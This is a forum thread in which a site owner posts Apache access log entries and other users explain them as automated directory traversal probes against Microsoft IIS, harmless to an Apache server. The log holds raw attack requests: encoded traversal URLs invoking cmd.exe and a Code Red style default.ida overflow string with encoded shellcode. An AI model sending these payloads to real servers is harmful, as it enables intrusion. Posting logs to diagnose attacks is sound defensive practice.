apache logs, seeing weird things
just been looking at my apache access logs and I am noticing some weird stuff on it, when I see the date I have no idea who is getting into it or whats going on, and I have my site password protected so no one should be in it.
I will post the log, can someone see anything from it? log ------------------------------------------------------------------------------------------ 24.1.1x.x - - [09/Jan/2004:06:27:46 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634 24.1.1x.x- - [09/Jan/2004:06:27:46 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634 24.1.1x.x- - [09/Jan/2004:06:27:46 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634 24.1.1xx - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 468 24.1.1x.x - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634 24.1.1x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634 24.1.1x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 459 24.1.1x.x - - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 459 24.1.1x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634 24.1.x.x- - [09/Jan/2004:06:27:47 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 634 24.218.x.x - - [09/Jan/2004:07:18:28 -0700] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 401 634 |
Not too much to worry about..
It's called a Directory traversal attack aimed at a M$ server, quite harmless to you. One look at the reply headers you have sent them and they will write you off their "possible" list. |
thanks for the quick response, I won't worry about it then.
|
yep, this is what you call "script kiddies"
|
All times are GMT -5. The time now is 07:21 PM. |